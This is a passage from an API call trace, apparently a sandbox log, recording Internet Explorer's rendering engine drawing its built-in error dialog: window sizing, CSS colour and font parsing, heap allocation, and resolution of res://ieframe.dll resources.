nIndex=-21) returned 13702144 [0159.784] WindowFromDC (hDC=0xd010a58) returned 0x103e2 [0159.784] GetCurrentThreadId () returned 0xb48 [0159.784] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.784] IsIconic (hWnd=0x103e0) returned 0 [0159.784] GetClientRect (in: hWnd=0x103e0, lpRect=0x1994d4 | out: lpRect=0x1994d4) returned 1 [0159.784] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0159.785] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x1994d4 | out: lprcDst=0xd0c5bc) returned 1 [0159.785] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0159.785] CopyRect (in: lprcDst=0x1993b4, lprcSrc=0x1994d4 | out: lprcDst=0x1993b4) returned 1 [0159.785] IntersectRect (in: lprcDst=0x1993c4, lprcSrc1=0x1993b4, lprcSrc2=0x1994d4 | out: lprcDst=0x1993c4) returned 1 [0159.785] EqualRect (lprc1=0x1993c4, lprc2=0x1993b4) returned 1 [0159.785] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0x87040a6c [0159.785] GetUpdateRgn (hWnd=0x103e2, hRgn=0x87040a6c, bErase=0) returned 2 [0159.785] ValidateRgn (hWnd=0x103e2, hRgn=0x87040a6c) returned 1 [0159.785] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0159.785] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0159.785] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19935c*=66530, plResult=0x1991b8 | out: plResult=0x1991b8) returned 0x1 [0159.785] NtdllDefWindowProc_W () returned 0x0 [0159.785] GetCurrentThreadId () returned 0xb48 [0159.785] InvalidateRgn (hWnd=0x103e2, hRgn=0x87040a6c, bErase=0) returned 1 [0159.792] DeleteObject (ho=0x87040a6c) returned 1 [0159.792] GetCurrentThreadId () returned 0xb48 [0159.795] NtdllDefWindowProc_W () returned 0x0 [0159.796] NtdllDefWindowProc_W () returned 0x0 [0159.797] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3097861655912) returned 1 [0159.798] GetCurrentThreadId () returned 0xb48 [0159.798] GetCurrentThreadId () returned 0xb48 [0159.798] GetCurrentThreadId () returned 0xb48 [0159.798] IUnknown:Release (This=0x9ee0b04) returned 0x3 [0159.798] GetCurrentThreadId () returned 0xb48 [0159.799] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.799] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0159.799] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.799] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.799] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.799] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.800] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.800] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0159.800] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.800] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.800] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.800] IsCharSpaceW (wch=0x62) returned 0 [0159.800] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.800] IsCharSpaceW (wch=0x3a) returned 0 [0159.801] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.801] IsCharSpaceW (wch=0x20) returned 1 [0159.801] IsCharSpaceW (wch=0x62) returned 0 [0159.801] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.801] IsCharSpaceW (wch=0x3b) returned 0 [0159.801] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.801] IsCharSpaceW (wch=0x20) returned 1 [0159.801] IsCharSpaceW (wch=0x66) returned 0 [0159.801] IsCharSpaceW (wch=0x65) returned 0 [0159.801] IsCharSpaceW (wch=0x62) returned 0 [0159.801] IsCharSpaceW (wch=0x62) returned 0 [0159.801] IsCharSpaceW (wch=0x65) returned 0 [0159.801] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.801] IsCharSpaceW (wch=0x62) returned 0 [0159.801] IsCharSpaceW (wch=0x75) returned 0 [0159.801] IsCharSpaceW (wch=0x74) returned 0 [0159.801] IsCharSpaceW (wch=0x74) returned 0 [0159.801] IsCharSpaceW (wch=0x6f) returned 0 [0159.801] IsCharSpaceW (wch=0x6e) returned 0 [0159.801] IsCharSpaceW (wch=0x66) returned 0 [0159.801] IsCharSpaceW (wch=0x61) returned 0 [0159.801] IsCharSpaceW (wch=0x63) returned 0 [0159.801] IsCharSpaceW (wch=0x65) returned 0 [0159.801] IsCharSpaceW (wch=0x75) returned 0 [0159.801] IsCharSpaceW (wch=0x74) returned 0 [0159.808] IsCharSpaceW (wch=0x74) returned 0 [0159.808] IsCharSpaceW (wch=0x6f) returned 0 [0159.808] IsCharSpaceW (wch=0x6e) returned 0 [0159.808] IsCharSpaceW (wch=0x66) returned 0 [0159.808] IsCharSpaceW (wch=0x61) returned 0 [0159.808] IsCharSpaceW (wch=0x63) returned 0 [0159.808] IsCharSpaceW (wch=0x65) returned 0 [0159.808] bsearch (_Key=0x199928, _Base=0x6d81eaa8, _NumOfElements=0x94, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x0 [0159.808] _wcsnicmp (_String1="buttonface", _String2="lightgrey", _MaxCount=0xa) returned -10 [0159.809] _wcsnicmp (_String1="buttonface", _String2="darkslateg", _MaxCount=0xa) returned -2 [0159.809] _wcsnicmp (_String1="buttonface", _String2="cornflower", _MaxCount=0xa) returned -1 [0159.809] _wcsnicmp (_String1="buttonface", _String2="blanchedal", _MaxCount=0xa) returned 9 [0159.809] _wcsnicmp (_String1="buttonface", _String2="burlywood", _MaxCount=0xa) returned 2 [0159.809] _wcsnicmp (_String1="buttonface", _String2="chartreuse", _MaxCount=0xa) returned -1 [0159.809] _wcsnicmp (_String1="buttonface", _String2="cadetblue", _MaxCount=0xa) returned -1 [0159.809] bsearch (_Key=0x199928, _Base=0x6d81e9c0, _NumOfElements=0x1d, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x6d81e9e8 [0159.809] _wcsnicmp (_String1="buttonface", _String2="inactiveca", _MaxCount=0xa) returned -7 [0159.809] _wcsnicmp (_String1="buttonface", _String2="buttonhigh", _MaxCount=0xa) returned -2 [0159.809] _wcsnicmp (_String1="buttonface", _String2="activecapt", _MaxCount=0xa) returned 1 [0159.809] _wcsnicmp (_String1="buttonface", _String2="background", _MaxCount=0xa) returned 20 [0159.809] _wcsnicmp (_String1="buttonface", _String2="buttonface", _MaxCount=0xa) returned 0 [0159.810] IsCharSpaceW (wch=0x0) returned 0 [0159.810] _wcsnicmp (_String1="none", _String2="none", _MaxCount=0x4) returned 0 [0159.810] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x6b6498 [0159.810] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.810] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.810] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.810] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.810] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.810] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x9ef11b0 [0159.812] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.812] IsCharSpaceW (wch=0x3a) returned 0 [0159.813] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.813] IsCharSpaceW (wch=0x20) returned 1 [0159.813] IsCharSpaceW (wch=0x6d) returned 0 [0159.813] IsCharAlphaNumericW (ch=0x20) returned 0 [0159.813] IsCharSpaceW (wch=0x20) returned 1 [0159.813] IsCharSpaceW (wch=0x73) returned 0 [0159.813] IsCharAlphaNumericW (ch=0x20) returned 0 [0159.813] IsCharSpaceW (wch=0x20) returned 1 [0159.813] IsCharSpaceW (wch=0x73) returned 0 [0159.813] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.813] IsCharSpaceW (wch=0x3b) returned 0 [0159.813] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.813] IsCharSpaceW (wch=0x20) returned 1 [0159.813] IsCharSpaceW (wch=0x66) returned 0 [0159.813] IsCharSpaceW (wch=0x66) returned 0 [0159.813] IsCharSpaceW (wch=0x6d) returned 0 [0159.813] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.814] IsCharSpaceW (wch=0x3a) returned 0 [0159.814] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.814] IsCharSpaceW (wch=0x20) returned 1 [0159.814] IsCharSpaceW (wch=0x38) returned 0 [0159.814] IsCharAlphaNumericW (ch=0x38) returned 1 [0159.814] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.814] IsCharSpaceW (wch=0x3b) returned 0 [0159.814] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.815] IsCharSpaceW (wch=0x74) returned 0 [0159.815] IsCharSpaceW (wch=0x38) returned 0 [0159.815] IsCharSpaceW (wch=0x38) returned 0 [0159.815] IsCharSpaceW (wch=0x74) returned 0 [0159.815] IsCharSpaceW (wch=0x38) returned 0 [0159.815] IsCharSpaceW (wch=0x70) returned 0 [0159.815] IsCharSpaceW (wch=0x74) returned 0 [0159.815] IsCharSpaceW (wch=0x0) returned 0 [0159.815] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x6b6568 [0159.815] StrChrW (lpStart="border", wMatch=0x3a) returned 0x0 [0159.815] IsCharSpaceW (wch=0x30) returned 0 [0159.816] StrChrW (lpStart="cellspacing", wMatch=0x3a) returned 0x0 [0159.816] IsCharSpaceW (wch=0x33) returned 0 [0159.816] StrChrW (lpStart="cellPadding", wMatch=0x3a) returned 0x0 [0159.816] IsCharSpaceW (wch=0x33) returned 0 [0159.816] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0159.816] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.816] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.816] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.817] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee69e0 | out: hHeap=0x5e0000) returned 1 [0159.817] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.817] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.817] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.817] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.817] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.817] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.825] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0159.825] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.825] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.825] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.826] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.826] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.826] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.826] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.826] StrChrW (lpStart="align", wMatch=0x3a) returned 0x0 [0159.826] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.826] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.826] StrChrW (lpStart="border", wMatch=0x3a) returned 0x0 [0159.827] IsCharSpaceW (wch=0x30) returned 0 [0159.827] StrChrW (lpStart="height", wMatch=0x3a) returned 0x0 [0159.827] IsCharSpaceW (wch=0x33) returned 0 [0159.827] StrChrW (lpStart="width", wMatch=0x3a) returned 0x0 [0159.827] IsCharSpaceW (wch=0x33) returned 0 [0159.827] StrChrW (lpStart="src", wMatch=0x3a) returned 0x0 [0159.827] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.827] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0159.828] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.828] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.828] memcpy_s (in: _Destination=0x6c5c8c, _DestinationSize=0x1fd4, _Source=0x199db0, _SourceSize=0x2 | out: _Destination=0x6c5c8c) returned 0x0 [0159.829] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.829] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0159.829] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.829] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.829] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.829] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.829] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.829] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.829] memcpy_s (in: _Destination=0x6c5c92, _DestinationSize=0x1fce, _Source=0x9ee59b0, _SourceSize=0x62 | out: _Destination=0x6c5c92) returned 0x0 [0159.829] memcpy_s (in: _Destination=0x199c18, _DestinationSize=0x200, _Source=0x9ee5a12, _SourceSize=0x2 | out: _Destination=0x199c18) returned 0x0 [0159.830] SetTimer (hWnd=0x103e2, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0159.830] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.830] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.832] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.832] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.832] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.832] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.832] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.833] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.833] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.833] GetSysColor (nIndex=15) returned 0xf0f0f0 [0159.833] StrCmpICW (pszStr1="ms sans serif", pszStr2="sans-serif") returned -6 [0159.842] StrCmpICW (pszStr1="ms sans serif", pszStr2="serif") returned -6 [0159.842] StrCmpICW (pszStr1="ms sans serif", pszStr2="monospace") returned 4 [0159.842] StrCmpICW (pszStr1="ms sans serif", pszStr2="cursive") returned 10 [0159.842] StrCmpICW (pszStr1="ms sans serif", pszStr2="fantasy") returned 7 [0159.842] StrCmpICW (pszStr1="ms sans serif", pszStr2="inherit") returned 4 [0159.842] StrCmpICW (pszStr1="ms sans serif", pszStr2="initial") returned 4 [0159.842] StrCmpICW (pszStr1="ms sans serif", pszStr2="default") returned 9 [0159.842] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0159.842] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.842] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.843] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.843] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9480 [0159.843] HashData (in: pbData=0x6d9480, cbData=0x1, pbHash=0x197af0, cbHash=0x2 | out: pbHash=0x197af0) returned 0x0 [0159.843] HashData (in: pbData=0x197aec, cbData=0x4, pbHash=0x197af8, cbHash=0x2 | out: pbHash=0x197af8) returned 0x0 [0159.843] HashData (in: pbData=0x6d9484, cbData=0xc, pbHash=0x197af4, cbHash=0x2 | out: pbHash=0x197af4) returned 0x0 [0159.843] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9480 | out: hHeap=0x5e0000) returned 1 [0159.843] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d94b0 [0159.843] HashData (in: pbData=0x6d94b0, cbData=0x1, pbHash=0x197af0, cbHash=0x2 | out: pbHash=0x197af0) returned 0x0 [0159.843] HashData (in: pbData=0x197aec, cbData=0x4, pbHash=0x197af8, cbHash=0x2 | out: pbHash=0x197af8) returned 0x0 [0159.843] HashData (in: pbData=0x6d94b4, cbData=0xc, pbHash=0x197af4, cbHash=0x2 | out: pbHash=0x197af4) returned 0x0 [0159.844] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d94b0 | out: hHeap=0x5e0000) returned 1 [0159.844] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.844] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.844] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.844] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b63e8 | out: hHeap=0x5e0000) returned 1 [0159.875] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.877] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.877] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.879] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.879] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.879] malloc (_Size=0x164) returned 0xc514f8 [0159.879] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.879] CreateUri (in: pwzURI="warning.gif", dwFlags=0x3002b85, dwReserved=0x0, ppURI=0x19a040 | out: ppURI=0x19a040*=0x9ee0864) returned 0x0 [0159.880] IUri:GetScheme (in: This=0x9ee0864, pdwScheme=0x19a038 | out: pdwScheme=0x19a038*=0x0) returned 0x0 [0159.884] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x199e68 | out: ppu=0x199e68) returned 0x0 [0159.884] IUnknown:AddRef (This=0x68e1fc) returned 0x7 [0159.884] IUnknown:QueryInterface (in: This=0x68e1fc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199ec4 | out: ppvObject=0x199ec4*=0x68e1fc) returned 0x0 [0159.885] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.885] IUnknown:AddRef (This=0x68e1fc) returned 0x8 [0159.885] CoInternetCombineIUri (in: pBaseUri=0x68e1fc, pRelativeUri=0x9ee0864, dwCombineFlags=0x6000000, ppCombinedUri=0x199f48, dwReserved=0x0 | out: ppCombinedUri=0x199f48*=0x9ee0784) returned 0x0 [0159.885] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.885] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1988d0 | out: ppvObject=0x1988d0*=0x6e784f9c) returned 0x0 [0159.885] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.885] IInternetProtocolInfo:CombineUrl (in: This=0x6e784f9c, pwzBaseUrl="res://ieframe.dll/error.dlg", pwzRelativeUrl="warning.gif", dwCombineFlags=0x6000000, pwzResult=0x198dac, cchResult=0x825, pcchResult=0x198d94, dwReserved=0x0 | out: pwzResult="", pcchResult=0x198d94*=0x0) returned 0x800c0011 [0159.885] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.885] IUnknown:Release (This=0x68e1fc) returned 0x8 [0159.885] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.886] IUri:GetScheme (in: This=0x9ee0784, pdwScheme=0x199f68 | out: pdwScheme=0x199f68*=0x12) returned 0x0 [0159.886] IUnknown:QueryInterface (in: This=0x9ee0784, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199e64 | out: ppvObject=0x199e64*=0x9ee0784) returned 0x0 [0159.886] IUnknown:Release (This=0x9ee0784) returned 0x2 [0159.886] IUnknown:AddRef (This=0x9ee0784) returned 0x3 [0159.886] IUri:GetAbsoluteUri (in: This=0x9ee0784, pbstrAbsoluteUri=0x199e60 | out: pbstrAbsoluteUri=0x199e60*="res://ieframe.dll/warning.gif") returned 0x0 [0159.887] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.887] IUnknown:AddRef (This=0x9ee0784) returned 0x4 [0159.887] IUri:GetSchemeName (in: This=0x9ee0784, pbstrSchemeName=0x199e20 | out: pbstrSchemeName=0x199e20*="res") returned 0x0 [0159.887] IUnknown:QueryInterface (in: This=0x9ee0784, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199e18 | out: ppvObject=0x199e18*=0x9ee0784) returned 0x0 [0159.887] IUnknown:Release (This=0x9ee0784) returned 0x4 [0159.887] IUnknown:AddRef (This=0x9ee0784) returned 0x5 [0159.887] IUri:GetScheme (in: This=0x9ee0784, pdwScheme=0x199e90 | out: pdwScheme=0x199e90*=0x12) returned 0x0 [0159.888] IUnknown:Release (This=0x9ee0784) returned 0x4 [0159.888] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.888] IUri:GetSchemeName (in: This=0x9ee0864, pbstrSchemeName=0x199f24 | out: pbstrSchemeName=0x199f24*="") returned 0x1 [0159.888] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.888] IInternetSecurityManager:MapUrlToZone (in: This=0x5f0200, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199e7c, dwFlags=0x0 | out: pdwZone=0x199e7c*=0x0) returned 0x0 [0159.888] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.888] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x9ef38b8 [0159.889] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x199b44, dwReserved=0x0 | out: ppSM=0x199b44*=0x6ce588) returned 0x0 [0159.889] IUnknown:QueryInterface (in: This=0x6ce588, riid=0x6d734ed8*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x199b48 | out: ppvObject=0x199b48*=0x6ce588) returned 0x0 [0159.889] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x9ef12d0 [0159.889] IInternetSecurityManager:SetSecuritySite (This=0x6ce588, pSite=0x9ef12d4) returned 0x0 [0159.889] IUnknown:AddRef (This=0x9ef12d4) returned 0x2 [0159.889] IUnknown:QueryInterface (in: This=0x9ef12d4, riid=0x703b4814*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x199b1c | out: ppvObject=0x199b1c*=0x9ef12d0) returned 0x0 [0159.889] IServiceProvider:QueryService (in: This=0x9ef12d0, guidService=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), riid=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), ppvObject=0x6ce5bc | out: ppvObject=0x6ce5bc*=0x0) returned 0x80004002 [0159.890] IServiceProvider:QueryService (in: This=0x9ef12d0, guidService=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x6ce5b8 | out: ppvObject=0x6ce5b8*=0x9ef12d8) returned 0x0 [0159.890] IUnknown:Release (This=0x9ef12d0) returned 0x3 [0159.890] IUnknown:AddRef (This=0x6ce588) returned 0x3 [0159.890] IUnknown:Release (This=0x6ce588) returned 0x2 [0159.890] IUnknown:Release (This=0x6ce588) returned 0x1 [0159.890] IUnknown:QueryInterface (in: This=0x9ee0784, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199b44 | out: ppvObject=0x199b44*=0x9ee0784) returned 0x0 [0159.890] IUnknown:Release (This=0x9ee0784) returned 0x4 [0159.890] IUnknown:AddRef (This=0x9ee0784) returned 0x5 [0159.890] ParseURLW (in: pcszURL="res://ieframe.dll/warning.gif", ppu=0x199b18 | out: ppu=0x199b18) returned 0x0 [0159.891] IUri:GetSchemeName (in: This=0x9ee0784, pbstrSchemeName=0x199b4c | out: pbstrSchemeName=0x199b4c*="res") returned 0x0 [0159.891] _wcsnicmp (_String1="res", _String2="data", _MaxCount=0x5) returned 14 [0159.891] SysStringLen (param_1="res://ieframe.dll/warning.gif") returned 0x1d [0159.891] QueryPerformanceCounter (in: lpPerformanceCount=0x199ac0 | out: lpPerformanceCount=0x199ac0*=3097870999083) returned 1 [0159.891] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19959c | out: ppvObject=0x19959c*=0x68e73c) returned 0x0 [0159.891] IUnknown:Release (This=0x68e73c) returned 0xf [0159.891] IUnknown:AddRef (This=0x68e73c) returned 0x10 [0159.891] IUnknown:Release (This=0x68e73c) returned 0xf [0159.892] IUnknown:QueryInterface (in: This=0x9ee0784, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19959c | out: ppvObject=0x19959c*=0x9ee0784) returned 0x0 [0159.892] IUnknown:Release (This=0x9ee0784) returned 0x5 [0159.892] IUnknown:AddRef (This=0x9ee0784) returned 0x6 [0159.892] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.892] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1988d0 | out: ppvObject=0x1988d0*=0x6e784f9c) returned 0x0 [0159.892] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.892] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/warning.gif", ParseAction=3, dwParseFlags=0x0, pwzResult=0x6db598, cchResult=0x1e, pcchResult=0x1988e0, dwReserved=0x0 | out: pwzResult="", pcchResult=0x1988e0*=0x27) returned 0x1 [0159.892] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.892] CreateUri (in: pwzURI="res://ieframe.dll/warning.gif", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x19484c | out: ppURI=0x19484c*=0x9ee13c4) returned 0x0 [0159.892] IUri:GetHost (in: This=0x9ee13c4, pbstrHost=0x194850 | out: pbstrHost=0x194850*="ieframe.dll") returned 0x0 [0159.892] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x194858, cchResult=0x1000, pcchResult=0x194840, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x194840) returned 0x0 [0159.892] SysReAllocString (in: pbstr=0x194850*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x194850*="ieframe.dll") returned 1 [0159.893] IUri:GetPath (in: 